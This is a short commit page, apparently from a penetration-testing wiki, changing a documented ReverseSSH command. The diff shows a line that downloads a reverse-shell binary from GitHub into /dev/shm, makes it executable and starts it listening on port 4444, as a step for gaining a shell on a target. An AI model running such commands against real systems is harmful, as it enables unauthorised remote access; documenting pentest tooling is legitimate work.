Merge pull request #284 from Fahrj/update-reversessh-usage

Adapt usage of ReverseSSH to latest release
This commit is contained in:
Carlos Polop 2021-12-22 21:42:14 +00:00 committed by GitHub
commit 592c66863e
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -49,7 +49,7 @@ Below is an example for `x86` with upx-compressed binaries. For other binaries,
# Drop it via your preferred way, e.g.
wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_reverse-sshx86 -O /dev/shm/reverse-ssh && chmod +x /dev/shm/reverse-ssh
/dev/shm/reverse-ssh -v -l :4444
/dev/shm/reverse-ssh -v -l -p 4444
```
* \(2a\) Linux target: